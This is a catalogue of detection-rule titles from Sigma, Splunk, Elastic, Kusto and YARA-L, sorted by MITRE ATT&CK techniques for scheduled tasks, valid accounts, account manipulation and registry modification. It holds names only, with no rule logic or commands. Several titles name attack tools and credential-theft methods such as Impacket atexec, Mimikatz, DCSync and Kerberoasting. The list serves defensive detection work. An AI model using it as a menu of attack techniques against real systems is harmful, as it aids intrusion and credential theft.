- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive AT Job test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Splunk Schedule Task with HTTP Command Arguments production
- Splunk Schedule Task with Rundll32 Command Trigger production
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Elastic Scheduled Tasks AT Command Enabled production
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks Run Task On Demand production
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Scheduled Task Write to System32 Tasks test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows Hidden Schedule Task Settings production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task DLL Module Loaded production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Scheduled Task/Job: At T1053.002 5 rules
- Elastic At.exe Command Lateral Movement production
- Sigma Interactive AT Job test
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Elastic Scheduled Tasks AT Command Enabled production
Scheduled Task/Job: Scheduled Task T1053.005 111 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Account Manipulation T1098 113 rules
- Sigma A Member Was Added to a Security-Enabled Global Group stable
- Sigma A Member Was Removed From a Security-Enabled Global Group stable
- Sigma A New Trust Was Created To A Domain stable
- Sigma A Security-Enabled Global Group Was Deleted stable
- Kusto Account added and removed from privileged groups
- Elastic Account Configured with Never-Expiring Password production
- Sigma Account marked as sensitive and cannot be delegated had its protection removed (weakness introduction) experimental
- Elastic Account Password Reset Remotely production
- Sigma Account password set to never expire. experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account set with Kerberos DES encryption activated (weakness introduction) experimental
- Sigma Account set with Kerberos pre-authentication not required (AS-REP Roasting) experimental
- Sigma Account set with password not required (weakness introduction) experimental
- Sigma Account set with reversible encryption (weakness introduction) experimental
- Elastic Active Directory Group Modification by SYSTEM production
- Sigma Active Directory User Backdoors test
- Kusto AD account with Don't Expire Password
- Kusto AD user enabled and password not set within 48 hours available
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Computer account created with privileges experimental
- Sigma Computer account manipulation for delegation (RBCD) experimental
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Kusto DEV-0270 New User Creation available
- Sigma Disabled guest or builtin account activated experimental
- Sigma Disabled guest or builtin account activated (command)
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Sigma Domain group membership change experimental
- Kusto DSRM Account Abuse
- Sigma DSRM password changed (native) experimental
- Sigma DSRM password changed (Reg via command) experimental
- Sigma DSRM password changed (Reg via PowerShell) experimental
- Sigma Enabled User Right in AD to Control User Objects test
- Kusto Group created then added to built in domain local or global group
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma High risk Active Directory group membership change experimental
- Sigma High risk local/domain local group membership change experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Any protocol experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Kerberos only experimental
- Sigma Host set with constrained delegation experimental
- Sigma Host set with unconstrained delegation experimental
- Sigma Host unconstrained delegation settings changed for potential abuse (Rubeus) experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Elastic KRBTGT Delegation Backdoor production
- Kusto Local Admin Group Changes available
- Sigma Local group membership change experimental
- Sigma Medium risk Active Directory group membership change experimental
- Sigma Medium risk local/domain local group membership change experimental
- Sigma Member added to DNSadmin group experimental
- Splunk Member added to security-enabled global group (Windows Event Log)
- Elastic Modification of the msPKIAccountCredentials production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (low risk) experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (medium risk) experimental
- Sigma New member added to an "OCS/Lync/Skype for Business" administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (medium risk) experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Change on Directory Service Restore Mode (DSRM) Account stable
- Sigma Password Set to Never Expire via WMI experimental
- Elastic Potential Active Directory Replication Account Backdoor production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Powershell LocalAccount Manipulation test
- Sigma Powerview Add-DomainObjectAcl DCSync AD Extend Right test
- Sigma Privilege SeMachineAccountPrivilege abuse experimental
- Elastic Sensitive Privilege SeEnableDelegationPrivilege assigned to a Principal production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma SPN added to an account by command line experimental
- Sigma Suspicious Computer Account Name Change CVE-2021-42287 test
- Sigma Suspicious modification of a computer account SPN experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) (Directory Services) experimental
- Sigma Suspicious modification of a user account SPN to enable Kerberoast attack experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Sigma User account creation disguised in a computer account experimental
- Kusto User account enabled and disabled within 10 mins
- Elastic User account exposed to Kerberoasting production
- Sigma User added to a group via commandline
- Sigma User Added To Highly Privileged Group test
- Sigma User Added to Local Administrator Group stable
- Sigma User Added to Local Administrators Group test
- Elastic User Added to Privileged Group in Active Directory production
- Sigma User password change using current hash password - ChangeNTLM (Mimikatz) experimental
- Sigma User password change without previous password known - SetNTLM (Mimikatz) experimental
- Splunk Windows AD add Self to Group production
- Splunk Windows AD DSRM Account Changes production
- Splunk Windows AD DSRM Password Reset production
- Splunk Windows AD Privileged Group Modification production
- Splunk Windows AD Self DACL Assignment production
- Splunk Windows AD ServicePrincipalName Added To Domain Account production
- Splunk Windows AD Short Lived Domain Account ServicePrincipalName production
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows DnsAdmins New Member Added production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Increase in Group or Object Modification Activity production
- Splunk Windows Increase in User Modification Activity production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Elastic WRITEDAC Access on Active Directory Object production
Account Manipulation: Additional Email Delegate Permissions T1098.002 1 rule
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
Account Manipulation: Additional Local or Domain Groups T1098.007 1 rule
- Elastic User Added to Privileged Group in Active Directory production
Modify Registry T1112 251 rules
- Sigma Activate Suppression of Windows Security Center Notifications test
- Sigma Add DisallowRun Execution to Registry test
- Sigma Allow RDP Remote Assistance Feature test
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Blackbyte Ransomware Registry test
- YARA-L Blackbyte Ransomware Registry
- Sigma Blue Mockingbird test
- Sigma Blue Mockingbird - Registry test
- Sigma Change the Fax Dll test
- Sigma Change User Account Associated with the FAX Service test
- Sigma ClickOnce Trust Prompt Tampering test
- Elastic Code Signing Policy Modification Through Registry production
- Elastic Component Object Model Hijacking production
- Sigma CrashControl CrashDump Disabled test
- Sigma CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry test
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma DHCP Callout DLL Installation test
- Sigma Disable Internal Tools or Feature in Registry test
- YARA-L Disable Internal Tools or Feature in Registry
- Splunk Disable Registry Tool production
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Splunk Disable Security Logs Using MiniNt Registry production
- Splunk Disable Show Hidden Files production
- Splunk Disable Windows App Hotkeys production
- Sigma Disable Windows Security Center Notifications test
- Splunk Disabling CMD Application production
- Splunk Disabling ControlPanel production
- Elastic Disabling Lsa Protection via Registry Modification production
- Splunk Disabling NoRun Windows App production
- Elastic Disabling User Account Control via Registry Modification production
- Elastic DNS Global Query Block List Modified or Disabled production
- Sigma DNS-over-HTTPS Enabled by Registry test
- Elastic DNS-over-HTTPS Enabled via Registry production
- Sigma Enable LM Hash Storage test
- Sigma Enable LM Hash Storage - ProcCreation test
- Splunk Enable WDigest UseLogonCredential Registry production
- Sigma ETW Logging Disabled For rpcrt4.dll test
- Sigma ETW Logging Disabled For SCM test
- Sigma ETW Logging Disabled In .NET Processes - Registry test
- Sigma ETW Logging Disabled In .NET Processes - Sysmon Registry test
- Elastic File or Directory Deletion Command production
- Sigma FlowCloud Registry Markers test
- Splunk FodHelper UAC Bypass production
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (PowerShell)
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (Windows Event Log)
- Elastic Image File Execution Options Injection production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Sigma Imports Registry Key From a File test
- Sigma Imports Registry Key From an ADS test
- Elastic Installation of Security Support Provider production
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Macro Enabled In A Potentially Suspicious Document test
- Splunk Malicious InProcServer32 Modification production
- Sigma Microsoft Office Trusted Location Updated test
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Sigma Modification of IE Registry Settings test
- Elastic Modification of WDigest Security Provider production
- Splunk Modify Registry Key (Windows Event Log)
- Elastic MS Office Macro Security Registry Modifications production
- Sigma NET NGenAssemblyUsageLog Registry Key Tamper test
- Sigma NetNTLM Downgrade Attack test
- Sigma NetNTLM Downgrade Attack - Registry test
- Elastic Netsh Helper DLL production
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New BgInfo.EXE Custom DB Path Registry Configuration test
- Sigma New BgInfo.EXE Custom VBScript Registry Configuration test
- Sigma New BgInfo.EXE Custom WMI Query Registry Configuration test
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Non-privileged Usage of Reg or Powershell test
- Elastic NullSessionPipe Registry Modification production
- Sigma OceanLotus Registry Activity test
- Sigma Office Macros Warning Disabled test
- Elastic Office Test Registry Persistence production
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled - Registry test
- Elastic Outlook Home Page Registry Modification production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Port Forwarding Rule Addition production
- Splunk Possible Credential Dumping via Windows Network Providers (PowerShell)
- Splunk Possible Credential Dumping via Windows Network Providers (Windows Event Log)
- Elastic Potential NetNTLMv1 Downgrade Attack production
- Sigma Potential NetWire RAT Activity - Registry test
- Sigma Potential Persistence Via Custom Protocol Handler test
- Sigma Potential Persistence Via Event Viewer Events.asp test
- Elastic Potential Persistence via Mandatory User Profile production
- Sigma Potential Persistence Via Outlook Home Page test
- Sigma Potential Persistence Via Outlook Today Page test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Qakbot Registry Activity test
- Sigma Potential Raspberry Robin Registry Set Internet Settings ZoneMap test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Suspicious Registry File Imported Via Reg.EXE test
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- YARA-L Potential Tampering With RDP Related Registry Keys Via Reg.EXE
- Sigma Potential Ursnif Malware Activity - Registry test
- Sigma Potentially Suspicious Desktop Background Change Using Reg.EXE test
- Sigma Potentially Suspicious Desktop Background Change Via Registry test
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Elastic PowerShell Script Block Logging Disabled production
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Sigma RDP Sensitive Settings Changed test
- YARA-L RDP Sensitive Settings Changed
- Sigma RDP Sensitive Settings Changed to Zero test
- YARA-L RDP Sensitive Settings Changed to Zero
- Sigma RedMimicry Winnti Playbook Registry Manipulation test
- Sigma Reg Add Suspicious Paths test
- Splunk Reg.exe Process Execution (Sysmon)
- Splunk Reg.exe Process Execution (Windows Event Log)
- Splunk Regini.exe Execution (Sysmon)
- Splunk Regini.exe Execution (Windows Event Log)
- Sigma Registry Entries For Azorult Malware test
- Splunk Registry Entry Created - PowerShell (PowerShell)
- Sigma Registry Explorer Policy Modification test
- Sigma Registry Hide Function from User test
- Splunk Registry key added with reg.exe (Sysmon)
- Splunk Registry key added with reg.exe (Windows Event Log)
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Registry Modification Via Regini.EXE test
- Elastic Registry Persistence via AppInit DLL production
